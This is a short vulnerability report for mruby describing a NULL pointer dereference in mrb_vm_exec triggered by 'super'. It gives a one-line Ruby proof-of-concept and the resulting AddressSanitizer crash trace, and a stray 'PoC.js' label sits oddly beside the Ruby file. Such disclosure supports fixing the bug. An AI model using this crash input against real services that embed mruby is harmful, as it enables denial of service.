Description

NULL Pointer Dereference in mrb_vm_exec with super

Proof of Concept

o13 = Comparable.initialize(){||0x7f.instance_eval() do super rescue caller (0…1).sort_by() do break end end }
// PoC.js
./mruby 1.rb

#Result
ASAN:DEADLYSIGNAL

==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0)
==19163==The signal is caused by a READ memory access.
==19163==Hint: address points to the zero page.
#0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752
#1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
#2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034
#3 0x55bde3b2fbc9 in mrb_yield_with_class /home/xxx/mruby/src/vm.c:879
#4 0x55bde3b0b521 in mrb_mod_initialize /home/xxx/mruby/src/class.c:1648
#5 0x55bde3b3fb19 in mrb_vm_exec /home/xxx/mruby/src/vm.c:1640
#6 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
#7 0x55bde3b7b42b in mrb_top_run /home/xxx/mruby/src/vm.c:3047
#8 0x55bde3bedb2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
#9 0x55bde3bede42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
#10 0x55bde3afc128 in main /home/xxx/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
#11 0x7f98eb47ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#12 0x55bde3af9339 in _start (/home/xxx/mruby/bin/mruby+0xc2339)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/xxx/mruby/src/vm.c:1752 in mrb_vm_exec
==19163==ABORTING